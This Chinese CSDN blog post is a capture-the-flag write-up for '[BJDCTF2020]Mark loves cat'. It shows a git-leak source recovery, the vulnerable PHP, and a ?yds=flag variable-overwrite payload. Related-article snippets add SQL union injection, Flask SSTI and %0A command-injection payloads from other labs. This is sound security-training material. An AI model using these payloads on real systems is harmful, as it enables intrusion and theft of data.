[BJDCTF2020]Mark loves cat

最新推荐文章于 2024-02-29 20:22:08 发布
最新推荐文章于 2024-02-29 20:22:08 发布
阅读量100 收藏
点赞数
分类专栏: BUUCTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyhdl666/article/details/115347611
版权
  • dirsearch扫描目录
    在这里插入图片描述
  • git泄露 我githack出猫病了 !
  • 得到两个文件
  • flag.php
<?php
$flag = file_get_contents('/flag');
  • index.php
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
    $$x = $y;
}
foreach($_GET as $x => $y){
    $$x = $$y;
}
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}
echo "the flag is: ".$flag;
  • 审计一下代码
  • 了解一下$$的变量覆盖
  • get传参?yds=flag
  • 在第二个foreach()中$x=yds,$y=flag
  • $$x=$$y,就变成,$yds=$flag
  • 这样的话yds的值就是flag对应的值了。
海上清辉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
marktext的中文包
07-21
标签“marktext的中文包”进一步确认了该压缩文件的内容,是针对MarkText的中文本地化版本,用于在非英文环境下正常使用MarkText的界面和功能。 **压缩包子文件解析** 1. **v8_context_snapshot.bin**: 这个文件是...
[BJDCTF2020]Mark loves cat(3种解法)
m0_64118193的博客
07-12 2427
练习靶场:BUUCTF 题目搜索:[BJDCTF2020]Mark loves cat靶机启动后的界面 步骤1:我们使用工具dirsearch扫描目录,观察是否有信息泄露 结论存在Git泄露,我们使用工具GitHack获取信息,得到一个index.php 相关知识点 exit函数的作用是输出一则消息并且终止当前脚本。 如果一段文本中包括多个以 ?>结束的脚本,则exit退出当前所在脚本,exit()函数这里存在一个突破点 foreach()函数这里存在了变量覆盖第二个if语句中可以看到这里是
BUUCTF-[BJDCTF2020]Mark loves cat
weixin_57938502的博客
11-20 387
用ctf-wscan扫一下 看着有点像git泄露,输入.git查看一下,发现是403拒绝访问,说明存在git泄露只不过我们没法访问 可以用lijiejie的GitHack下载一下 下载下来打开有两个文件。 flag.php内容是读取flag文件赋值给$flag变量 index.php打开在最下面有一段PHP代码 遍历传入的get参数,要求传入的参数的键为flag并且等于$x又要求$x不等于flag,满足要求就会退出脚本。(这个两个要求相互矛盾根本不可能完成)...
BUUCTF [BJDCTF2020]Mark loves cat个人解题思路
最新发布
2301_79843470的博客
02-29 487
利用变量覆盖漏洞将yds覆盖成flag,直接使用GET传递yds=flag,当遇到下面这个循环时,yds会被覆盖成flag(其实这个应该有三种解题思路,这是其中一种,刚接触php的题,我也是一知半解)即可,不过我这边下载的时候出现了点问题,下载的git_extract.py是个空白文件。发现下载了两个文件:index.php和flag.php。那我对此的解决方法是在本地下载然后拖进kali里面。首先查看源代码,并开始扫描敏感文件,发现有git泄露。的下载方式,下载网站是这个。
BUUCTF [BJDCTF2020]Mark loves cat
qtL0ng的博客
06-29 3153
打开题目 搜索一番没有任何发现; dirsearch扫描后发现.git泄露,GitHack.py下载源码: python GitHack.py http://b77333f7-af9a-4f4a-aad0-b328ef9c8369.node3.buuoj.cn/.git 得到两个php文件,接下来就是代码审计: flag.php: <?php $flag = file_get_contents('/flag'); index.php: <?php include 'flag.php';
web buuctf [BJDCTF2020]Mark loves cat1
weixin_44214568的博客
03-30 886
考点: 1.git泄露 2.变量覆盖 1.打开靶机,先看robots.txt,并用dirsearch进行扫描 py dirsearch.py -u f190ddaf-3db0-48c2-a858-4accf0783a69.node4.buuoj.cn:81/ -e * -t 1 -x 429 (使用dirsearch时,一定要设置好线程,不然扫不出来) 扫描发现错在.git泄露 2.利用githack把git文件抓下来 python2 GitHack.py http://f190
[BJDCTF2020]Mark loves cat(特详解)
热门推荐
qq_74806534的博客
02-01 1万+
可变变量:如果一个变量保存的值刚好是另外一个变量的名字,那么可以直接通过访问一个变量得到另外一个变量的值:在变量之前再多加一个 $ 符号。前半段和前面的方法原理相同,让flag覆盖is 后面的flag=flag—>$flag=$flag 目的是为了符合第三个if需求。这里的值表面是 x 但前面我们进行了变量覆盖使得 x=flag 所以在这里我们输出x的值就是flag的值。后面的目的就是让我们传入的变量是 flag 值不是flag 进而能够exit handsome。可以简单理解为$$x就相当于是$($x)
[BJDCTF2020]Mark loves cat(解决githack无法下载源码&&githack无法获取文件)
qq_64201116的博客
06-05 1150
点击这里下载选择安装路径后在该文件夹下路径输入cmd,在命令行中输入python Githack.py 127.0.0.1/.git(你的网址后面有/.git就行) 这里有一题比较简单的变量覆盖题目,可以思考一下我们并不知道$test是什么,但是有个extract($_GET)可以把我们输入的get传参全部变成变量那我们就可以在url输入?test=1&gift=1 即可满足输出flag条件还有一种就是$$x的模式 有了这些思路就来进入页面发现没有什么功能点,那就先扫一下有没有文件泄露在githack
[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞)
qq_43622442的博客
05-04 8079
[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞) 这几天被学生机折磨死了,第一次用好多不熟练,刷个题压压惊。 1.拿到网站,发现所有的超链接都是指向自己的:(两种答案都在最后) 2.扫描目录找到 .git 泄露: (做ctf题要习惯用dirsearch,而且要调低线程): dirsearch.py -u url -e * --timeout=2 -t 1 ...
[BJDCTF2020]Mark loves cat三种解法
weixin_45751765的博客
01-06 1191
0x00 前言 比较基本的代码审计,考查变量覆盖 目录滚一下 Githack -> down一下 不知道为什么现在flag.php和index.php都down不下来了 --?可能靶场环境问题把 直接拿师傅wp里的源码了 关于对源码的个人理解我已标明在注释中 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x =
MarkText.zip
08-04
MarkText是一个MIT许可的开源项目,最新的版本可以从GitHub发布页面免费下载。MarkText还在发展中,它的发展离不开所有的赞助商。 特点: 实时预览(所见即所得)和一个干净和简单的界面。 支持CommonMark Spec, ...
coremark 源代码
08-23
coremark 源代码 移植后,即可测试目标MCU的coremark评分 注意:该评分与编译器版本密切相关。
markText安装包
02-19
标题“markText安装包”所指的是一款名为markText的应用程序的安装文件,它是一个广受程序员喜爱的开源笔记软件。markText的主要特点是其简洁的用户界面和强大的Markdown支持,使得编写和预览代码注释变得既简单又...
BUU SQL COURSE 1
CyhDl666的博客
03-12 3369
进入题目给了两个页面 一开始以为在注入点在登录页面 尝试了万能密码 和 各种闭合 没发现注入的方式 接着尝试了热点列表页面的注入 但是url上好像不存在注入 F12在net中找到了隐藏的url 访问content_detail.php?id=1页面构造payload ?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# # admin、co.
Buuctf [第三章 web进阶]SSTI 20
CyhDl666的博客
03-19 1428
进入页面用arjun扫描一下有什么url参数 这道题是最基础的了 直接给payload前面的payload吧 {{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}} 页面返回:password is wrong: app bin boot dev etc home lib lib64 media m.
buuctf [pasecactf_2019]flask_ssti
CyhDl666的博客
03-18 1224
题目已经告诉是SSTI模板注入了 测试一下 做题时用""发现了过滤 fuzz一下 过滤了很多东西 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换 附上自己写的python脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(ssti) 将下面内容转化为16进制 __class__.
[FBCTF2019]RCEService
CyhDl666的博客
04-14 691
文章目录解法一 %0A截断解法二:PHP利用PCRE回溯次数限制绕过某些安全限制 进入页面要求用json的格式上传命令 解法一 %0A截断 {"cmd":"ls"} 尝试cat 读取源码 发现被禁止了 尝试%0A绕过 cmd={%0A"cmd":"/bin/cat ../../../home/rceservice/flag"%0A} 写下自己的疑惑和解答 先把源码附上 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_R
EOS 5D MARKIII 数码单反相机详细指南
"EOS 5D MARKIII中文说明书" 佳能EOS 5D MARKIII是一款专业级的数码单反相机,以其出色的性能和丰富的功能而备受摄影爱好者和专业摄影师的青睐。该相机搭载了一块约2230万有效像素的全画幅(36x24毫米)CMOS图像...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值